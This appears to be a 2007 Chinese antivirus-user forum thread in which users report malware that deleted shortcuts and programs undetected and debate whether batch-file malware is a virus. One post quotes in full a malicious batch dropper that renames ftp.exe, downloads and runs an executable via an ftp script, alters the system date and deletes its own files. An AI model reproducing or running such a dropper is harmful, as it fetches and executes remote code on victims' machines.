微点交流论坛
» 游客:  注册 | 登录 | 帮助

 微点交流论坛 » 微点主动防御软件 » 微点没反映的强大病毒  

 11  1/2  1  2  > 
作者:
标题: 微点没反映的强大病毒
caomao202
新手上路





积分 4
发帖 4
注册 2007-7-23
#1  微点没反映的强大病毒

运行之后桌面快界方式全部被删除,并且刷新一次就会复制很多,C盘迅雷、瑞星卡卡、显卡驱动、暴风影音2、Winamp、GHOST被删除,微点没反映,病毒作者说采用单一简单行为就可以过微点行为分析库,上传不了附件,请管理员联系:caomao202@sohu.com

※ ※ ※ 本文纯属【caomao202】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-6 00:42
查看资料  发送邮件  发短消息   编辑帖子
曙光
版主

版主



积分 1421
发帖 1420
注册 2005-11-1
#2  

谢谢楼主对微点的支持,请你将这个样本发送到virus@micropoint.com.cn,然后将你的发送的邮箱,以短消息的形式发给我,我们会尽快分析的!

[ Last edited by Legend on 2007-10-6 at 07:34 ]

※ ※ ※ 本文纯属【曙光】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

技服电话:0591-87569401、87516430、87539717
东方微点“反病毒技术交流”群:
       ·QQ群:630086 或 1471553 或 16998902
   
2007-10-6 01:02
查看资料  发短消息   编辑帖子
天笑
注册用户





积分 50
发帖 40
注册 2007-8-3
#3  

难道又是一个批处理?

※ ※ ※ 本文纯属【天笑】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-6 07:33
查看资料  发短消息   编辑帖子
wantcm
版主

使用与技巧区消防员


积分 2351
发帖 2247
注册 2007-4-7
#4  

貌似是批处理,批处理只要用户不自己运行就没有危害的东西。

平常我们删除/修改文件,发现删除错了那叫误操作。

而恶意批处理是批量的删除/修改文件,也就是批量的误操作。

批处理不是病毒,它没有自我复制传播的能力,只要保持一点点警惕性,不运行可疑的程序,就不会危害系统和文件资料。

说一个不太形象的比喻,杀毒软件好比是保镖,保护系统不会被刺客谋杀,而批处理是毒药,非要吃进去自杀,“保镖”很难顾及到的。

※ ※ ※ 本文纯属【wantcm】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

做为斑竹,一定要消灭0回复
2007-10-6 10:08
查看资料  发送邮件  发短消息   编辑帖子
全能人
注册用户





积分 172
发帖 172
注册 2007-9-16
#5  

这病毒如此厉害,微点一点也没有察觉吗,看来微点要好好改进了!

※ ※ ※ 本文纯属【全能人】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-6 11:14
查看资料  发送邮件  发短消息   编辑帖子
zx121122
新手上路





积分 18
发帖 18
注册 2007-7-8
#6  

我最近中过好几个批处理的病毒,其中一个批处理的内容:
set a=星期四 2099-01-01
date=2099-01-01
if exist C:\WINNT\system32\dllcache\ftp.exe ren C:\WINNT\system32\dllcache\ftp.exe sft.exe
if exist C:\WINNT\system32\ftp.exe ren C:\WINNT\system32\ftp.exe sft.exe
sft.exe -s:C:\WINNT\help.dll
if not exist in.exe ftp -s:C:\WINNT\help.dll
in.exe
in.exe
date=%a%
:end
del C:\WINNT\help.dll
del C:\WINNT\BEGIN.BAT
exit

※ ※ ※ 本文纯属【zx121122】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-6 14:16
查看资料  发送邮件  发短消息   编辑帖子
100000
版主

灌水区华南水务使


积分 3285
发帖 3250
注册 2007-2-26
来自 深圳
#7  

是病毒不够强大!!!---只搞些小动作

※ ※ ※ 本文纯属【100000】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

日出东方 微点先行 主动防御 快人一步
2007-10-6 18:34
查看资料  发送邮件  发短消息   编辑帖子
lqwoshifeng
注册用户





积分 84
发帖 86
注册 2006-7-8
#8  



  Quote:
Originally posted by wantcm at 2007-10-6 10:08:
貌似是批处理,批处理只要用户不自己运行就没有危害的东西。

平常我们删除/修改文件,发现删除错了那叫误操作。

而恶意批处理是批量的删除/修改文件,也就是批量的误操作。

批处理不是病毒,它没有自我复 ...

说的很有道理,不过虽然它不自运行,但改个名字诱惑你运行是肯定的,他肯定不会起个“我是病毒,别点我”的名。呵呵,很多人就是这样上了当的。不可不防。

※ ※ ※ 本文纯属【lqwoshifeng】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-7 15:19
查看资料  发送邮件  发短消息   编辑帖子
topyym
新手上路





积分 8
发帖 8
注册 2007-10-1
#9  

个人愚见,对于批处理文件,无论是恶意的还是有益的(自己编写的无害的批处理),作为杀软或者其他防御性软件,即使不杀,也应该向用户发出警报,告之为批处理文件。

※ ※ ※ 本文纯属【topyym】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2007-10-8 10:59
查看资料  发短消息   编辑帖子
fanyv
中级用户




积分 481
发帖 489
注册 2006-4-30
#10  

同意楼上的观点,发现批处理可以给出提示并且显示其批处理内容!

谨代表个人观点

※ ※ ※ 本文纯属【fanyv】个人意见,与【 微点交流论坛 】立场无关※ ※ ※

烦雨
2007-10-8 12:21
查看资料  访问主页  发短消息   编辑帖子
 11  1/2  1  2  > 



论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏


[ 联系我们 - 东方微点 ]

北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司

闽ICP备05030815号